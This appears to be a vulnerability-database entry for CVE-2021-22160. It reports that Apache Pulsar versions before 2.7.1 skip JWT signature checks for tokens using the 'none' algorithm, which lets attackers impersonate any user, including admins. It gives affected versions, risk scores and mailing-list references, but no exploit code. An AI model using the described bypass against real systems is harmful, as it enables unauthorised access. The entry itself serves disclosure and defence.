Lucene search

ApacheCVELIST:CVE-2021-22160

HistoryMay 26, 2021 - 12:22 p.m.

CVE-2021-22160 Authentication with JWT allows use of “none”-algorithm

2021-05-2612:22:31

apache

www.cve.org

cve-2021-22160

authentication bypass

jwt

apache pulsar

json web tokens

signature validation

attack

pulsar instances

user impersonation

AI Score

9.6

Confidence

High

EPSS

0.017

Percentile

87.7%

JSON

If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to “none”. This allows an attacker to connect to Pulsar instances as any user (incl. admins).

CNA Affected

[
  {
    "product": "Apache Pulsar",
    "vendor": "Apache Software Foundation",
    "versions": [
      {
        "lessThan": "2.7.1",
        "status": "affected",
        "version": "Apache Pulsar",
        "versionType": "custom"
      }
    ]
  }
]

References

lists.apache.org/thread.html/r347650d15a3e9c5f58b83e918b6ad6dedc2a63d3eb63da8e6a7be87e%40%3Cusers.pulsar.apache.org%3E

lists.apache.org/thread.html/r8e545559781231a83bf0644548c660255859e52feb86bbfcd42590da%40%3Cdev.pulsar.apache.org%3E

lists.apache.org/thread.html/r9a12b4da2f26ce9b8f7e7117a879efaa973dab7e54717bbc7923fab1%40%3Cdev.pulsar.apache.org%3E

lists.apache.org/thread.html/ra49cb62105154e4795b259c79a6b27d63bfa2ab5787ff8529b089550%40%3Cdev.pulsar.apache.org%3E

lists.apache.org/thread.html/ra49cb62105154e4795b259c79a6b27d63bfa2ab5787ff8529b089550%40%3Cusers.pulsar.apache.org%3E

lists.apache.org/thread.html/rbe845aa1573a61769b9c5916c62971f4b10de87c2ea5f38a97f0cf84%40%3Cdev.pulsar.apache.org%3E

lists.apache.org/thread.html/rca54f4b26ba5e6f2e39732b47ec51640e89f57e3b6a38ac3bab314df%40%3Cdev.pulsar.apache.org%3E

lists.apache.org/thread.html/rf2e90942996dceebac8296abf39257cfeb5ae918f82f7af3d37a48c5%40%3Cdev.pulsar.apache.org%3E